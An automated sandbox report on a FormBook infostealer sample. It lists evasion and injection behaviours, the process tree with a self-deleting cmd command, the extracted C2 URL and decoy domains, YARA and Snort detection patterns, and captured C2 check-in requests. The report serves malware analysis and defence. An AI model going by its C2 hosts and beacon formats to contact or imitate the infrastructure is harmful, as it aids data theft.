Play interactive tour

Edit tour

Analysis Report 00098765123POIIU.exe

Overview

General Information

Sample Name:	00098765123POIIU.exe
Analysis ID:	411893
MD5:	4e2d6ab0c9a56aee76ba33bd26dce9b1
SHA1:	52950b4637fc55518efc063ced7bec0867f9051e
SHA256:	5e2255d59560c85c4a6c30ffa54e00b2805b584292de464befaf01a614539229
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

00098765123POIIU.exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\00098765123POIIU.exe' MD5: 4E2D6AB0C9A56AEE76BA33BD26DCE9B1)

RegSvcs.exe (PID: 6572 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 6920 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 6940 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hysjs168.com/uv34/"], "decoy": ["lattakia-imbiss.com", "helenafinaltouch.com", "yogamays.com", "habangli.com", "embraceblm.com", "freeurlsite.com", "szxanpet.com", "inspirationalsblog.com", "calibratefirearms.net", "chelseashalza.com", "ihdeuruim.com", "symbolofsafety.com", "albanyhumanesociety.net", "exclusiveoffer.bet", "888yuntu.com", "maraitime.com", "caletaexperience.com", "dreamlikeliving.com", "wolvesmito.club", "zbyunjin.com", "senkrononline.com", "thesugarbasket.com", "organiccbgoil.com", "amazoncor.xyz", "dofus-tr.com", "bhzconstrutora.com", "onlinepaintandsips.com", "sandybottomsflipflops.com", "paobuyingxiong.com", "wokeinteractive.com", "furbabiesandflowers.com", "hellojesse.com", "ssssummit.com", "vaiu-ks.com", "akb48-loveantena.com", "wagsorganics.com", "import-union.com", "sxrqsgs.icu", "72loca.com", "ssc018.com", "jewelta.com", "buildingdigitalmind.com", "pantechinsulation.com", "cobakoreksinjinx.com", "mischurretes.com", "contorig2.com", "julesecurity.com", "soccer-yokouchi.club", "gofourd.com", "holdimob.com", "omorashi-mania.com", "ytksw.com", "gsf-fashon.com", "bogolacke.com", "odislewis.com", "shenzhenmaojinchang.com", "kimsfist.com", "xsites-dev.xyz", "buraktradingltd.com", "muldentaxi.com", "supergurlmarketing.com", "areametalurgia.com", "dejikatsu.com", "pcbet999.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7f788:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7fb12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa69a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa6d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb2a45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8b311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb2531:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8b927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb2b47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8ba9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb2cbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8052a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa774a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8a58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb17ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x812a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xa84c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x90917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb7b37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x919ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8d849:$sqlite3step: 68 34 1C 7B E1 0x8d95c:$sqlite3step: 68 34 1C 7B E1 0xb4a69:$sqlite3step: 68 34 1C 7B E1 0xb4b7c:$sqlite3step: 68 34 1C 7B E1 0x8d878:$sqlite3text: 68 38 2A 90 C5 0x8d99d:$sqlite3text: 68 38 2A 90 C5 0xb4a98:$sqlite3text: 68 38 2A 90 C5 0xb4bbd:$sqlite3text: 68 38 2A 90 C5 0x8d88b:$sqlite3blob: 68 53 D8 7F 8C 0x8d9b3:$sqlite3blob: 68 53 D8 7F 8C 0xb4aab:$sqlite3blob: 68 53 D8 7F 8C 0xb4bd3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 00098765123POIIU.exe PID: 6396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
3.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\00098765123POIIU.exe' , ParentImage: C:\Users\user\Desktop\00098765123POIIU.exe, ParentProcessId: 6396, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6572

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hysjs168.com/uv34/"], "decoy": ["lattakia-imbiss.com", "helenafinaltouch.com", "yogamays.com", "habangli.com", "embraceblm.com", "freeurlsite.com", "szxanpet.com", "inspirationalsblog.com", "calibratefirearms.net", "chelseashalza.com", "ihdeuruim.com", "symbolofsafety.com", "albanyhumanesociety.net", "exclusiveoffer.bet", "888yuntu.com", "maraitime.com", "caletaexperience.com", "dreamlikeliving.com", "wolvesmito.club", "zbyunjin.com", "senkrononline.com", "thesugarbasket.com", "organiccbgoil.com", "amazoncor.xyz", "dofus-tr.com", "bhzconstrutora.com", "onlinepaintandsips.com", "sandybottomsflipflops.com", "paobuyingxiong.com", "wokeinteractive.com", "furbabiesandflowers.com", "hellojesse.com", "ssssummit.com", "vaiu-ks.com", "akb48-loveantena.com", "wagsorganics.com", "import-union.com", "sxrqsgs.icu", "72loca.com", "ssc018.com", "jewelta.com", "buildingdigitalmind.com", "pantechinsulation.com", "cobakoreksinjinx.com", "mischurretes.com", "contorig2.com", "julesecurity.com", "soccer-yokouchi.club", "gofourd.com", "holdimob.com", "omorashi-mania.com", "ytksw.com", "gsf-fashon.com", "bogolacke.com", "odislewis.com", "shenzhenmaojinchang.com", "kimsfist.com", "xsites-dev.xyz", "buraktradingltd.com", "muldentaxi.com", "supergurlmarketing.com", "areametalurgia.com", "dejikatsu.com", "pcbet999.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 00098765123POIIU.exe

ReversingLabs: Detection: 25%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Source: 3.2.RegSvcs.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00098765123POIIU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00098765123POIIU.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi		3_2_0040C3D5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi		7_2_032FC3D5

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.hysjs168.com/uv34/

Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1Host: www.contorig2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1Host: www.muldentaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1Host: www.gofourd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1Host: www.ihdeuruim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1Host: www.embraceblm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1Host: www.ytksw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1Host: www.buraktradingltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1Host: www.bogolacke.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1Host: www.albanyhumanesociety.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1Host: www.sandybottomsflipflops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.54.117.217 198.54.117.217

Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1Host: www.contorig2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
